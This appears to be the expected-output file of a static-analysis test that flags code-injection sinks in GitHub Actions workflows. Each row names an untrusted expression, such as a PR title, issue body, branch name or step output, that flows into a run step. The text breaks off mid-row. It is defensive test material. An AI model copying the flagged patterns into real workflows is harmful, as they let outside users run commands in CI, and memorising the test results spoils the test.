.github/workflows/self_needs.yml:4:3:4:15 | issue_comment | .github/workflows/self_needs.yml | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | .github/workflows/simple2.yml | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | .github/workflows/simple3.yml | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | .github/workflows/simple3.yml | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | .github/workflows/slash_command2.yml | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | .github/workflows/test1.yml | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | .github/workflows/test2.yml | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | .github/workflows/test2.yml | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | .github/workflows/test3.yml | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | .github/workflows/test5.yml | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | .github/workflows/test8.yml | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | .github/workflows/test8.yml | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | .github/workflows/test11.yml | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | .github/workflows/test12.yml | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | .github/workflows/test18.yml | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho 